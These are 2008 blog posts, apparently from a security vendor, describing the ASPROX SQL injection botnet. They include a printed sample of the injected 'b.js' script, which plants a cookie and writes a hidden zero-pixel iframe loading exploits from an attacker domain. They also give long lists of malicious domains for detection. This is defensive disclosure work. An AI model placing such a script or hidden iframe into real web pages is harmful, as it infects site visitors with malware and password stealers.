Monday, June 30, 2008

ASPROX SQL Compromised my website, now what?

Many people are calling and emailing us for information about ASPROX and something most people seem to be unaware of is how this affects the visitors of your infected website?

So I will walk you through what happens:

Once your ASP website is compromised by the ASPROX SQL Injection you now host malware. A malicious piece of javascript "b.js" is loaded from one of the domains listed in my previous posts, the javascript creates a "asprox was here" cookie and opens a hidden 0 pixel iframe from yet another bad domain which is "the malware can of worms". These domains constantly rotate IP's (for protection from blocklisting) using fast flux dns.

Here is sample contents from the javascript (b.js):

window.status="";
var cookieString = document.cookie;
var start = cookieString.indexOf("updatebng=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+12*1*60*60*1000);
document.cookie = "updatebng=update;expires="+expires.toGMTString();
try{
document.write("iframe src=http//supbnr.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0 /iframe");
}
catch(e)
{
};
}


The malware can vary but is typically a mishmash of exploits which target several recent browser based vulnerabilities in quicktime, adobe reader, flash and even AOL instant messenger. Once a vulnerable client goes to your site the malware is successfully loaded and not only becomes a zombie slave within the ASPROX botnet (the same hosts that attacked your webserver) it also installs various nefarious programs like a password stealer which defrauds you of your online accounts. Infected clients are reported to be sending out bank phishing emails as well.

So in short review for those who are not-so-technical...

if you have a website infected with ASPROX and not cleaned/updated/secured, your website is infecting and spreading malware to others who simply viewed your site in their browser



That means you have an obligation to address this problem immediately! Please contact us for the information packet on ASPROX defense today.

Thursday, June 26, 2008

ASPROX SQL Injection Attacks cont.

ASPROX continues to ravage the web, please contact us for the information packet we put together with defense suggestions.

New ASPROX malware domains: app52.com, appid37.com, apps84.com, asp27.com, asp72.com, script46.com, ssl39.com, st212.com, cid26.com, dl251.com, getbwd.com, st212.com, asp707.com, aspssl63.com, aspx49.com, batch29.com, bin963.com, bios47.com, hlpgetw.com, lang34.com, update34.com, westpacsecuresite.com

Monday, June 23, 2008

ASPROX SQL Injection Botnet and iFrame/Malware

We first noticed this attack when one of our larger clients saw a barrage of SQL injection alerts in the report of their Sentinel IPS (6,000 in one week). We looked into and found the extremely clever attack which hides the SQL Injection payload in a hexidecimal string to evade IDS/IPS. Well our device caught the attack at the initial injection stage hence the hex evasion portion of the attack failed.

So what is the good news? Sentinel IPS our managed security product protects against this attack even before it reaches your webserver by catching the initial SQL injection. This means instant protection from this ASP/SQL Injection threat without having to re-write your ASP code over night.

Grab our ASPROX toolkit for information on cleaning and defending from this attack.


***UPDATE*** I met with Dallas US Secret Service office today and this issue is much more wide spread than we previously thought. We want to help so if you have any information for us or need assistance cleaning up this mess give us a call.

How do you know if your site was compromised? Check your ASP application with your browser by viewing source and seeing if their is javascript which loads an iframe containing any of the following domains:

***UPDATE*** Maybe faster to search for the string "/b.js"

nihaorr1.com, free.hostpinoy.info, xprmn4u.info, nmidahena.com, winzipices.cn, sb.5252.ws, aspder.com, 11910.net, bbs.jueduizuan.com, bluell.cn, 2117966.net, s.see9.us, xvgaoke.cn, 1.hao929.cn, 414151.com, cc.18dd.net, yl18.net, kisswow.com.cn, urkb.net, c.uc8010.com, rnmb.net, ririwow.cn, killwow1.cn, xiaobaishan.net, qiqigm.com, wowgm1.cn, wowyeye.cn, 9i5t.cn, c11.8866.org, computershello.cn, tlcn.net, z008.net, b15.3322.org, qiqicc.cn, direct84.com, heihei117.cn, caocaowow.cn, qiuxuegm.com, locale48.com, firestnamestea.cn, fami4ka.net, redir94.com, rexec39.com, en-us18.com, ck1.in, adjuncnet.com, rundll92.com, sysid72.com, n.uc8010.com, libid53.com, qiqi111.cn, heartgames.cn, logid83.com, datajto.com, adw95.com, tjwh202.162.ns98.cn, jetadwor.com, cookieadw.com, bannerupd.com, nb88.cn, bigadnet.com, 1.cool0.biz, updatebnr.com, flyzhu.9966.org, sslnet72.com, advertbnr.com, script46.com, fengnima.cn, tag58.com, banner82.com, smeisp.cn, hoursebuilds.cn, hyperadw.com, adsitelo.com, okey123.cn, b.kaobt.cn, getadw.com, nihao112.com, al.99.vc, aidushu.net, a.13175.com, chliyi.com, free.edivid.info, 52-o.cn, fucksb.net, 0.actualization.cn, d39.6600.org, h28.8800.org, 001yl.com, ucmal.com, t.uc8010.com, dota11.cn, pingbnr.com, bnrcompro.com, y66.us, m11.3322.org, bc0.cn, clsidw.com, adword71.com, killpp.cn, bnradw.com, cmiia.com, sslput4.com, exe94.com, bnrcntrl.com, w11.6600.org, usuc.us, hlpadw.com, jumpbnr.com, advabnr.com, siteid38.com, msshamof.com, refer68.com, newasp.com.cn, wowgm2.cn, mm.jsjwh.com.cn, updatead.com, win496.com, usuc.us, view89.com, 17ge.cn, err68.com, upgradead.com, adword72.com, kk6.us, clickbnr.com, 117275.cn, c23.2288.org, sysid72.com, encode72.com, exec51.com, pingadw.com, vb008.cn, wow112.cn, nihaoel3.com, p060523.info, o7n9.cn, rundll841.com, jetdbs.com, dbdomaine.com, domaincld.com, clsiduser.com, heiheinn.cn, coldwop.com, alzhead.com, chinabnr.com, adwbnr.com, chkbnr.com, chkadw.com